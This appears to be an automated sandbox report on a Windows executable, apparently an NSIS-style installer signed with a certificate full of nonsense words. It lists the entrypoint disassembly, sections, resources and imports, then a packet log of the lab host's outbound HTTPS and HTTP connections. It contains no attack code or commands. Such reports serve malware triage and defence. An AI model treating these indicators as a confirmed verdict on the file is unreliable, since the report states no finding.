Subject Chain	E=Diversifikationerne@sandstrandene.tem, O=Venstredrejningens, OU="Underoverskrift Citrater ", CN=Venstredrejningens, L=Toulouse, S=Occitanie, C=FR
Version:	3
Thumbprint MD5:	75050B1E746D5429477C5A68BCFD9E21
Thumbprint SHA-1:	FEF58B8C88C3A7019893DDA67A14AFB484889DCB
Thumbprint SHA-256:	4E4E7EE9FCEDAD632CDB2B36C7A0E6D2626003A7066901CFB6F10526D082FEF2
Serial:	131460D1497BD2FF7FF62120033746B61504C2D3

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080B0h]
call dword ptr [004080ACh]
cmp ax, 00000006h
je 00007F29647D94E3h
push ebx
call 00007F29647DC624h
cmp eax, ebx
je 00007F29647D94D9h
push 00000C00h
call eax
mov esi, 004082B8h
push esi
call 00007F29647DC59Eh
push esi
call dword ptr [0040815Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F29647D94BCh
push ebp
push 00000009h
call 00007F29647DC5F6h
push 00000007h
call 00007F29647DC5EFh
mov dword ptr [007A8A24h], eax
call dword ptr [0040803Ch]
push ebx
call dword ptr [004082A4h]
mov dword ptr [007A8AD8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0079FEE0h
call dword ptr [00408188h]
push 0040A2C8h
push 007A7A20h
call 00007F29647DC1D8h
call dword ptr [004080A8h]
mov ebp, 007B3000h
push eax
push ebp
call 00007F29647DC1C6h
push ebx
call dword ptr [00408174h]
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c4000	0x490d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc5480	0xa80	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6154	0x6200	bde81925c04b8b13a9c5dc11c6cbba5f	False	0.6732700892857143	data	6.479248571798096	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x13a4	0x1400	2fd23f25ba6d052f3a4f032544496f73	False	0.453125	data	5.162313935974215	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb18	0x600	769652d049c5b87df2f7a3908b2269c6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x1b000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c4000	0x490d8	0x49200	5ab8afaa186dee014e18cc6ae51c575a	False	0.1406116452991453	data	2.670186974669167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3c43e8	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States	0.11987750392046631
RT_ICON	0x406410	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.29139004149377595
RT_ICON	0x4089b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.32786116322701686
RT_ICON	0x409a60	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.40085287846481876
RT_ICON	0x40a908	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.3447653429602888
RT_ICON	0x40b1b0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.2914634146341463
RT_ICON	0x40b818	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.28901734104046245
RT_ICON	0x40bd80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.325354609929078
RT_ICON	0x40c1e8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.39381720430107525
RT_ICON	0x40c4d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.527027027027027
RT_DIALOG	0x40c5f8	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x40c740	0x100	data	English	United States	0.5234375
RT_DIALOG	0x40c840	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x40c960	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x40ca28	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x40ca88	0x92	data	English	United States	0.6095890410958904
RT_VERSION	0x40cb20	0x278	data	English	United States	0.5063291139240507
RT_MANIFEST	0x40cd98	0x33d	XML 1.0 document, ASCII text, with very long lines (829), with no line terminators	English	United States	0.5536791314837153

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 2, 2024 15:05:47.611500025 CEST	49678	443	192.168.2.4	104.46.162.224
May 2, 2024 15:05:49.174009085 CEST	49675	443	192.168.2.4	173.222.162.32
May 2, 2024 15:05:58.575567961 CEST	49733	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.575613976 CEST	443	49733	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.575747967 CEST	49733	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.575947046 CEST	49733	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.575956106 CEST	443	49733	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.622673035 CEST	49734	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.622700930 CEST	443	49734	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.622780085 CEST	49734	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.623049974 CEST	49734	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.623064041 CEST	443	49734	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.771696091 CEST	443	49733	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.772155046 CEST	49733	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.772181988 CEST	443	49733	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.773614883 CEST	443	49733	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.773673058 CEST	49733	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.775011063 CEST	49733	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.775090933 CEST	443	49733	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.775455952 CEST	49733	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.775465965 CEST	443	49733	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.778970957 CEST	49675	443	192.168.2.4	173.222.162.32
May 2, 2024 15:05:58.809812069 CEST	443	49734	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.810041904 CEST	49734	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.810050964 CEST	443	49734	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.811475039 CEST	443	49734	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.811534882 CEST	49734	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.811882019 CEST	49734	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.811954021 CEST	443	49734	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.814722061 CEST	49733	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.836533070 CEST	49734	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.836539030 CEST	443	49734	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.837460995 CEST	49735	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.837521076 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.837605000 CEST	49735	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.837841988 CEST	49735	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.837886095 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.876313925 CEST	49734	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:58.974611998 CEST	443	49733	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.978246927 CEST	443	49733	142.251.32.100	192.168.2.4
May 2, 2024 15:05:58.978307962 CEST	49733	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:59.023351908 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:05:59.228121996 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:05:59.230156898 CEST	49735	443	192.168.2.4	142.251.32.100
May 2, 2024 15:05:59.421902895 CEST	443	49734	142.251.32.100	192.168.2.4
May 2, 2024 15:05:59.422054052 CEST	443	49734	142.251.32.100	192.168.2.4
May 2, 2024 15:05:59.422126055 CEST	49734	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.432892084 CEST	49735	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.432919025 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.433422089 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.434209108 CEST	49735	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.434271097 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.434362888 CEST	49735	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.476119041 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.682327986 CEST	49734	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.682393074 CEST	443	49734	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.706754923 CEST	49736	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.706804037 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.706901073 CEST	49736	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.710005045 CEST	49733	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.710036039 CEST	443	49733	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.716876030 CEST	49736	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.716891050 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.725622892 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.725661039 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.725725889 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.725909948 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.725924969 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.903084993 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.903491020 CEST	49736	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.903516054 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.903803110 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.904613018 CEST	49736	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.904675961 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.904766083 CEST	49736	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.911015987 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.911381006 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.911397934 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.911684990 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.912175894 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.912235022 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.912486076 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.952126026 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.960125923 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.980156898 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.981436968 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.981483936 CEST	49735	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.983180046 CEST	49735	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.983197927 CEST	443	49735	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.988866091 CEST	49738	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.988893986 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:00.988950014 CEST	49738	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.989180088 CEST	49738	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:00.989193916 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.090665102 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.090701103 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.090745926 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.090768099 CEST	49736	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.090804100 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.090816975 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.090847015 CEST	49736	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.090867043 CEST	49736	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.119059086 CEST	49736	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.119091034 CEST	443	49736	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.120706081 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.120763063 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.120800018 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.120832920 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.120970011 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.121010065 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.121018887 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.123738050 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.123780966 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.123790026 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.129930019 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.129976988 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.129986048 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.135361910 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.135410070 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.150640011 CEST	49737	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.150665998 CEST	443	49737	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.175884008 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.176183939 CEST	49738	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.176197052 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.176480055 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.176783085 CEST	49738	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.176841021 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.176908016 CEST	49738	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.224123001 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.364228964 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.364259005 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.364295006 CEST	49738	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.364308119 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.364362001 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:01.364399910 CEST	49738	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.365572929 CEST	49738	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:01.365590096 CEST	443	49738	142.251.32.100	192.168.2.4
May 2, 2024 15:06:02.458179951 CEST	49741	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:02.458206892 CEST	443	49741	142.251.32.100	192.168.2.4
May 2, 2024 15:06:02.462233067 CEST	49741	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:02.462536097 CEST	49741	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:02.462541103 CEST	443	49741	142.251.32.100	192.168.2.4
May 2, 2024 15:06:02.651933908 CEST	443	49741	142.251.32.100	192.168.2.4
May 2, 2024 15:06:02.652278900 CEST	49741	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:02.652288914 CEST	443	49741	142.251.32.100	192.168.2.4
May 2, 2024 15:06:02.652563095 CEST	443	49741	142.251.32.100	192.168.2.4
May 2, 2024 15:06:02.653167963 CEST	49741	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:02.653219938 CEST	443	49741	142.251.32.100	192.168.2.4
May 2, 2024 15:06:02.860359907 CEST	49741	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:11.273488045 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:11.273520947 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:11.273586988 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:11.274874926 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:11.274888992 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:11.772514105 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:11.772573948 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:11.775126934 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:11.775140047 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:11.775333881 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:11.920893908 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:12.156303883 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:12.200119019 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.483508110 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.483535051 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.483544111 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.483577013 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.483588934 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.483606100 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.483649015 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:12.483669043 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.483691931 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:12.483724117 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:12.483942986 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.483951092 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.483985901 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:12.484006882 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:12.484010935 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.484031916 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:12.486191034 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:12.665045023 CEST	443	49741	142.251.32.100	192.168.2.4
May 2, 2024 15:06:12.665095091 CEST	443	49741	142.251.32.100	192.168.2.4
May 2, 2024 15:06:12.665155888 CEST	49741	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:14.498095989 CEST	49741	443	192.168.2.4	142.251.32.100
May 2, 2024 15:06:14.498125076 CEST	443	49741	142.251.32.100	192.168.2.4
May 2, 2024 15:06:14.546134949 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:14.546158075 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:14.546169043 CEST	49745	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:14.546175003 CEST	443	49745	40.68.123.157	192.168.2.4
May 2, 2024 15:06:52.865868092 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:52.865897894 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:52.865983963 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:52.866343021 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:52.866355896 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.360769987 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.360882998 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:53.364752054 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:53.364761114 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.364998102 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.373140097 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:53.416117907 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.846731901 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.846759081 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.846774101 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.846827030 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:53.846844912 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.846858025 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.846889019 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.846911907 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:53.846920967 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.846944094 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:53.846947908 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.846992016 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:53.883249044 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:53.883264065 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:06:53.883281946 CEST	49752	443	192.168.2.4	40.68.123.157
May 2, 2024 15:06:53.883287907 CEST	443	49752	40.68.123.157	192.168.2.4
May 2, 2024 15:07:02.518758059 CEST	49754	443	192.168.2.4	142.251.32.100
May 2, 2024 15:07:02.518800020 CEST	443	49754	142.251.32.100	192.168.2.4
May 2, 2024 15:07:02.518879890 CEST	49754	443	192.168.2.4	142.251.32.100
May 2, 2024 15:07:02.519155979 CEST	49754	443	192.168.2.4	142.251.32.100
May 2, 2024 15:07:02.519177914 CEST	443	49754	142.251.32.100	192.168.2.4
May 2, 2024 15:07:02.705889940 CEST	443	49754	142.251.32.100	192.168.2.4
May 2, 2024 15:07:02.706365108 CEST	49754	443	192.168.2.4	142.251.32.100
May 2, 2024 15:07:02.706394911 CEST	443	49754	142.251.32.100	192.168.2.4
May 2, 2024 15:07:02.706729889 CEST	443	49754	142.251.32.100	192.168.2.4
May 2, 2024 15:07:02.707076073 CEST	49754	443	192.168.2.4	142.251.32.100
May 2, 2024 15:07:02.707139015 CEST	443	49754	142.251.32.100	192.168.2.4
May 2, 2024 15:07:02.757297039 CEST	49754	443	192.168.2.4	142.251.32.100
May 2, 2024 15:07:06.611176014 CEST	49723	80	192.168.2.4	199.232.214.172
May 2, 2024 15:07:06.611238003 CEST	49724	80	192.168.2.4	199.232.210.172
May 2, 2024 15:07:06.698250055 CEST	80	49723	199.232.214.172	192.168.2.4
May 2, 2024 15:07:06.698266029 CEST	80	49723	199.232.214.172	192.168.2.4
May 2, 2024 15:07:06.698386908 CEST	49723	80	192.168.2.4	199.232.214.172
May 2, 2024 15:07:06.698843002 CEST	80	49724	199.232.210.172	192.168.2.4
May 2, 2024 15:07:06.698857069 CEST	80	49724	199.232.210.172	192.168.2.4
May 2, 2024 15:07:06.698901892 CEST	49724	80	192.168.2.4	199.232.210.172
May 2, 2024 15:07:12.706656933 CEST	443	49754	142.251.32.100	192.168.2.4
May 2, 2024 15:07:12.706720114 CEST	443	49754	142.251.32.100	192.168.2.4
